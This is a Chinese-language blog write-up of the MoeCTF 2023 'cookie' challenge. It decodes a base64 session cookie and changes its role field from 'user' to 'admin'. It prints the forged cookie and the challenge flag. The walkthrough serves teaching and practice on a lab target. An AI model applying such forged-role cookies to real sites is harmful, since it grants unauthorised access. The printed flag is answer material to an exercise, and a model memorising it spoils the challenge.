MoeCTF 2023-cookie | 李青帝

LOADING

加载过慢请开启缓存 浏览器默认开启

MoeCTF 2023-cookie

2023/9/28 CTF burpsuite POST GET

README.MD

一些api说明

注册 POST /register

{
    "username":"koito",//随便取
    "password":"123456"//随便取
}

登录 POST /login

{
    "username":"koito",//随便取
    "password":"123456"//随便取
}

获取flag GET /flag

查询服务状态 GET /status

注册:

image-20230928161240002

base64解码得:

{"username": "liqingdi", "password": "liqingdi", "role": "user"}

登录:

image-20230928161537945

查看flag:

image-20230928161803991

{"username": "liqingdi", "password": "liqingdi", "role": "user"}

修改为:

{"username": "liqingdi", "password": "liqingdi", "role": "admin"}

然后base64编码:

eyJ1c2VybmFtZSI6ICJsaXFpbmdkaSIsICJwYXNzd29yZCI6ICJsaXFpbmdkaSIsICJyb2xlIjogImFkbWluIn0=

得到真正的flag:

moectf{cooKi3_is_d3licious_MA9iVff90SSJ!!M6Mrfu9ifxi9i!JGofMJ36D9cPMxro}